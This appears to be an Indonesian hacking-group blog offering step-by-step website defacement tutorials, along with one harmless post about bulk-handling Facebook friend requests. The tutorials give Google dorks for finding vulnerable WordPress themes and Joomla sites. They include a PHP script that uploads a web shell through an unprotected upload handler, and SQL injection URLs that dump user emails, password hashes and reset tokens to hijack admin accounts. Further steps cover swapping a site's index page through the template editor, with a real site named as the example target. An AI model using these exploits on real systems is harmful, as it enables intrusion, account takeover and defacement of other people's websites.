Indonesian Grey Hat Army

Minggu, 05 Januari 2014

Tutorial Deface With REMOTE FILE UPLOAD EXPLOIT VULNERABILITY

By 4SPIR3
Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell (Bisa Pakek Shell GCA)

Langkah-Langkah:
1).Search Di Google Gunakan Dork

inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"

2).Ane Pkek Dork Yang inurl:"/wp-content/themes/radial-theme/"

3).Jika Ketemu Masukan Exploit /wp-content/themes/radial-theme/functions/upload-handler.php jika Keluar Error Situsnya Vuln

4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D

$uploadfile="shellKamu.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

5).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D

6) Aktifkan Xampp Pada Apache
7).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
8).Ketik cd\xampp/php

9)ketik php namascript.php Contoh: php lol.php
10).Jika Succes Akan Ada Nama Shellnya :D

11).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/2013/11/namashell.php

Jika ada yg di tanyakan tanyakan di forum kami
Disini

readmore...

Deface Dengan Com_Artform

udah lama kaga posting
maklum admin lagi UAS
heheheheh :v

langsung aja deh kita bahas mengenai topik yaitu
Deface Dengan Com_Artform dari 4SPIR3

1. Ketik dork ini ke google : inurl:"option com_artforms"

2. Pilih salah 1 web untuk dijadikan target

3. Masukkan exploit ini : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
Contoh : www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

4. Nanti anda akan melihat email dari web tersebut. Copy email tersebut ke notepad.

5. Sekarang anda masuk ke tempat reset password dengan buka tab baru, lalu masukkan kode ini /index.php?option=com_user&view=reset
Contoh : www.site.com/index.php?option=com_user&view=reset

6. Sebelum reset password, anda akan disuruh memasukkan email. Nah, masukkan email yang tadi anda copy ke notepad. Lalu klik "submit"

7. Selanjutnya, anda akan disuruh memasukkan token. Nah anda buka tab baru dan masukkan exploit ini : index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users
Contoh : www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

8. Nanti akan muncul kode aktivasi/token seperti ini admineda7d6142fac40a533b56407a4617371. Yang ditebalkan adalah username webnya, sedangkan yang digariskan adalah tokennya. Anda masukkan token tersebut pada form memasukkan token yang tadi. Klik enter.

9. Kini form untuk mereset password sudah muncul, nah masukkan password yang anda inginkan untuk masuk ke web tersebut sebagai admin. Misal : androidnymous

10. Jika berhasil, anda masuk deh ke panel adminnya : www.site.com/administrator

11. Masukkan username yang tadi ditemukan dan password yang sudah anda reset.
Contoh : username = admin, password = androidnymous

12. Dan kini anda berhasil masuk sebagai admin. Saatnya mulai menanam shell anda

jangan lupa kunjungi page kami DISINI

readmore...

Sabtu, 21 Desember 2013

Auto Konfirmasi atau Menolak Semua Permintaan Pertemanan di Facebook (automatis)

Malam minggu sepi yg lain pada bawa pacar masing - masing tapi ane jomblo jadi bisanya cuma kumpul ama temen - temen doang
batangan samua lagi >:(

Baiklah tanpa banyak basa - basi langsung kita bahas permasalahan utama kita

yaitu:

KONFIRMASI SEMUA TEMAN FACEBOOK ATAU MENOLAK SECARA OTOMATIS

BY.Ac.Dc

Disini saya bahas dengan menggunakan FIREFOX caranya mari kita lihat

- Terutama anda harus login dulu ke https://facebook.com
- Setelah itu buka link ini https://www.facebook.com/reqs.php

jika sudah login lalu tekan tombol berikut secara bersamaan

CTRL+SHIFT+K

maka tampilan akan seperti berikut

jika sudah copas code di bawah ini di dalam kolom setelah >>

UNTUK KONFIR SEMUA PERMINTAAN PERTEMANAN

javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0);

UNTUK MENGHAPUS SEMUA PERMINTAAN SEMUA PERTEMANAN

javascript:for( i = 1;i<document.getElementsByName("actions[hide]").length;i++){document.getElementsByName("actions[hide]")[i].click();}void(0);

lalu tekan enter dan tunggu hingga selesai

TTTTTAAAAAAAAAARRRRRRAAAAAAAA
selamat anda berhasil

jangan lupa like fans page ane yakk DISINI

readmore...

Rabu, 18 Desember 2013

Cara Tebas Index Com_User [exploit joomla]

assalamualaikum .....

kali ini saya akan coret - coret sedikit tentang cara tebas index di joomla

1.pertama - tama kamu harus masuk sebagai admin melalui www.site.com/administrator

jika kamu sudah masuk maka tampilanya akan seperti ini:

2. Lalu klik Templates. Atau klik icon seperti ini:

3.Maka akan muncul tampilan seperti ini :

4. Ceklis pada kotak kecil di depan Beez2 - Default seperti berikut :

jika sudah klik Make default atau icon bintang di atas

jika berhasil maka akan keluar tampilan seperti ini dan sejenisnya

5. selanjutnya kita akan mengganti indexnya
klik Templates di samping Styles :

6. selanjutnya klik pada beez_20 detail

7. maka akan muncul tampilan seperti di bawah ini :

setelah itu klik Edit main page template yg berada tepat di bawah bezz_20

8.akan muncul tampilan scipt lalu ganti script tersebut dengan script deface kamu :

jika sudah lalu klik save and close atau gambar disket di atas

9.jika keluar tulisan biru seperti ini atau sejenisnya maka SELAMAT ANDA BERHASIL

coba buka wab tersebut
dan hasilnya
TTAAAAAARRRRRRRRRAAAAAAAAAAAAAAA

10. Segeralah anda bertaubat dan
Titip Nama: Indonesian Grey Hat Army

**Note

Kami sarankan dan kami tekankan agar kalian semua untuk tidak mengganti template awal wab tersebut
melainkan menggantinya terlebih dahulu kepada template beez barulah ganti dengan script ente
Jangan Pernah Mendeface Situs Negara Sendiri (y)

readmore...

Tutorial Deface Dengan Com_User

Assalamualaikum....

Kali ini saya akan post tentang " tutorial deface com_user "

Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin kalo seandainya gagal, itu karena website udah di patch
oke dah simak nih! sebelumnya download dulu bahan2nya :p

1. Download : Exploit Joomla.html
2. Titip Nama : Indonesian Grey Hat Army

Ciri2 web yg vuln com_user, silahkan sobat check dulu administratornya, jika seperti gambar dibawah, berarti web tersebut memungkinkan untuk bisa di exploitasi

bira lebih memudahkan sobat dalam mencari web target, silahkan gunakan Tool Scanner Com User

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:powered by joomla ®. designed by joomla 1.7 templates hosting valid xhtml and css site:.es

intitle:home page beez 5 inurl:com/joomla

intitle:home page atomic inurl:com/jooml

2. Setelah dapat wab yg vuln lalu masukin exploit berikut:

index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:
http://odysseysoutheast.com/administrator

4. kemudian ane ganti menjadi:

http://odysseysoutheast.com/index.php?option=com_users&view=registration

5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:

6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !

7. Url juga copy ke exploitjomla tadi "liat contoh di bawah"

di ganti dengan

http://odysseysoutheast.com/index.php?option=com_users&view=registration

Note: username, email, boleh diganti sesuka hati.

8. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!

8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!

9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!

10. Lalu masuk kehalaman admin login nya!

http://odysseysoutheast.com/administrator

11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username:Ac.Dc
Password:12345

Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin!

selsnjutnya tinggal tebas indexnya dehh .... Klik Disini

KALO GA BERHASIL LOGIN SEBAGAI ADMIN, SILAHKAN CARI TARGET LAINNYA!!

Goodluck!!! :p

udah gitu aja! Salam........ :p

readmore...

INDONESIAN GREY HAT ARMY

Indonesian Grey Hat Army
adalah sebuah team kecil yg beranggotakan kurang lebih 46 orang.

Team ini adalah team yg berasal dari Riau Hacker Team yg mana anggotanya tidak jauh berbeda.

Riau Hacker Team sendiri terbentuk karena ketidak sengajaan. Dimana pada sebuah pertemuan antara Dedy Irawan dengan Ghozie bertempat pada sebuah mol yg berada di Pekanbaru - Riau.

Melalui sebuah percakapan ringan akhirnya mereka berniat untuk membangun sebuah grup kecil yg bernama RIAU HACKER TEAM. Akhirnya lambat laun memberpun bertambah banyak dan semakin banyak. Termasuk saya adalah member baru yg cuma bisa ikut - ikutan.

Dan Berikut adalah member - member dari Indonesian Grey Hat Army:

- Xcaramel

- SF-Resistance

- 4SPIR3

- Key Lock

- AssassinNymou'S